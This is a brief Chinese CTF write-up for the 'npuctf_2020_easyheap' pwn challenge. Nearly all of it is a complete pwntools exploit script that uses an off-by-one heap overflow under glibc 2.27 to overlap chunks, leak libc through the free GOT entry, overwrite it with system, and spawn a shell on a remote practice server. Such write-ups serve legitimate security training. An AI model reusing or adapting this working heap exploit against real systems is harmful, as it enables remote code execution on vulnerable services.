npuctf_2020_easyheap
查看保护
2.27下的0ff-by-one。overlapping改指针为got,泄露出libc之后直接edit这个got为system即可。off-by-one具体看z1r0’s blog
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
file_name = './z1r0'
debug = 1
if debug:
r = remote('node4.buuoj.cn', 29274)
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
menu = 'Your choice :'
def add(size, content):
r.sendlineafter(menu, '1')
r.sendlineafter('Size of Heap(0x10 or 0x20 only) : ', str(size))
r.sendafter('Content:', content)
def edit(index, content):
r.sendlineafter(menu, '2')
r.sendlineafter('Index :', str(index))
r.sendafter('Content: ', content)
def delete(index):
r.sendlineafter(menu, '4')
r.sendlineafter('Index :', str(index))
def show(index):
r.sendlineafter(menu, '3')
r.sendlineafter('Index :', str(index))
add(0x18, 'aaaa') #0
add(0x18, 'bbbb') #1
add(0x18, '/bin/sh\x00') #2
p1 = b'a' * 0x18 + b'\x41'
edit(0, p1)
delete(1)
free_got = elf.got['free']
p2 = b'a' * 0x10 + p64(0) + p64(0x21) + p64(0x38) + p64(free_got)
add(0x38, p2)
show(1)
free_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
success('free_addr = ' + hex(free_addr))
libc = ELF('libc-2.27.so')
libc_base = free_addr - libc.sym['free']
system_addr = libc_base + libc.sym['system']
p3 = p64(system_addr)
edit(1, p3)
delete(2)
r.interactive()